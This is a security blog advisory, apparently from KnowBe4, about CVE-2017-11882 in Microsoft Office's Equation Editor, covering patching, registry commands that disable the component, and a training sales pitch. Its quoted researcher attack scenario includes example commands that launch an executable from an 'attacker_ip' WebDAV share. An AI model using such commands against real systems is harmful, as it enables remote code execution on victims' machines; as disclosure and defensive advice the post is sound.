Skeleton in the closet: 17-year old MS office flaw allows malware install when user opens file



Skeleton_In_Closet-1.pngHere is a new pain in the neck! Fix this one ASAP.

While the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.

The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document. Here is how it looks, when you see the CALC coming up, that means the attacher was able to run any executable they want. 

EMBEDI

 

The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.

However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.

Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.

Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.

This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).

Possible Attack Scenario:

While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:

"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."

"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."

"Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."

"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."

Protection Against Microsoft Office Vulnerability

With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.

So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.

Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.

Users can run the following command in the command prompt to disable registering of the component in Windows registry:

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

For 32-bit Microsoft Office package in x64 OS, run the following command:

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

Besides this, you should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).

Now, it would also be a very good idea to step users through new-school security awareness training, so that they would think before they open an attachment they did not ask for. 

I strongly suggest you get a quote for your organization and find out how affordable this is. You simply have got to start training and phishing your users ASAP, because your filters never catch all of it. And we know. Why? Our customers literally report thousands of emails every days—using the free Phish Alert Button—that have made it through all the filters into your end-user's inbox.  

Get a quote now and you will be pleasantly surprised.

Get A Quote

Don't like to click on redirected buttons? Cut & Paste this link in your browser:

https://info.knowbe4.com/kmsat_get_a_quote_now

Let's stay safe out there.

Warm regards,

Stu Sjouwerman,

Founder and CEO, KnowBe4, Inc

NewStu.png

 

 

 

Source HackerNews

 


Topics: Malware



Subscribe to Our Blog


Comprehensive Anti-Phishing Guide




Get the latest about social engineering

Subscribe to CyberheistNews